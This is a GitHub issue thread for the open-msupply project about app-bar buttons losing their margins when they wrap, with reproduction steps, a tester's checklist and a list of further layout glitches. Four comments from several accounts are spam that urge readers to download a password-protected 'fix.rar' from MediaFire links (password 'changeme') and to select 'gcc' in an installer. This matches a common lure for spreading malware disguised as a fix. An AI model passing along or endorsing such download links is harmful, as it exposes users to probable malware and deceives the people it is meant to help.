### ISSUE TITLE
Wrapped AppBarButtons have no margin

### ISSUE THREAD

**Issue by lache-melvin** [msupply-foundation/open-msupply#4691]
## What went wrong? 😲

Sometimes the buttons wrap, if there are a lot of them, on a just-big-enough-that-the-button-are-expanded sized screen (especially when you open the side panels).

When they do this, they lose their top and bottom margin:
![Screenshot 2024-08-27 at 12 41 41 PM](https://github.com/user-attachments/assets/ff107606-a135-4758-b455-5e61a2176cf5)

Looks pretty ugly with the drop shadows lol:
![Screenshot 2024-08-27 at 12 45 19 PM](https://github.com/user-attachments/assets/d7c9bd3c-c609-495a-8eef-b1773034275b)

## Expected behaviour 🤔

When they're all in one line, they have some margin - this should still exist if they wrap across two lines:
![Screenshot 2024-08-27 at 12 40 21 PM](https://github.com/user-attachments/assets/edba9c36-7e67-4b9e-b135-b94b81623817)

## How to Reproduce 🔨

Steps to reproduce the behaviour:

1. Go to a page w lots of buttons, like Internal Order
2. Make screen as narrow as you can without the button text collapsing to only show icon
3. And/or open the nav drawer/more info panel to reduce the width of the main page
4. See buttons wrapping, with no margin above/below

## Your environment 🌱

- Open mSupply Version: 2.2
- Legacy mSupply Central Server Version:

- Platform:

- Database type:

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alainsussol** [comment]
# 🧪 Testing



- [ ] Go to internal order
- [ ] Change sizing of screen
   - [ ] There is margin between button and the objects below **-PASS-**

**Comment by alainsussol** [comment]
@roxy-dao, @lache-melvin  

Hi Roxy
It might not have been in the scope of that issue/Pull request but I noticed those

1) When there is an information box displayed, there is no margin between that information box and the Action object when you narrow the window. You can see it in Inbound shipment, customer returns
![Image](https://github.com/user-attachments/assets/3e2c37ea-a62e-4335-bbe0-47487d03153a)

2) Also there is a lot of pages in a window and you hover over the left menu, there is no margin between the pagination bar information and the detail lines section and when the page is full.
![Image](https://github.com/user-attachments/assets/6aaf5e91-4888-4be5-9925-a92f3b7146c6)

3) In supplier return window there is no margin between the reference field and the Actions object. Seem to work ok in other windows
![Image](https://github.com/user-attachments/assets/9d87ff8b-94dd-4bd3-8477-18998be8aef1)

4) Also in the requisition window if you hover over the left menu, part of customer name, customer reference and filter items are partly hidden while in other windows like internal order, you see them completely.
![Image](https://github.com/user-attachments/assets/37f7d6a3-583e-435c-83f9-c584471c9a9c)

5) In the internal order the DPS column title seems to wrap upward unlike all the other column titles while narrowing the size of the screen 
Normal size screen
![Image](https://github.com/user-attachments/assets/83fbd471-3608-4150-a831-1891e620c288)

Minimal size screen
![Image](https://github.com/user-attachments/assets/05946c54-c078-4b6b-b2a6-3767ab69ccc6)

6) I am not sure if it can be fix or if it is normal behaviour but when the list of a list object is displayed and the size of the screen is changed the list follow the list object with a certain, unmistakable, delay :).

https://drive.google.com/file/d/1tRdjmws482SlQFaaQQoW4hcI1xmRgwKZ/view?usp=sharing
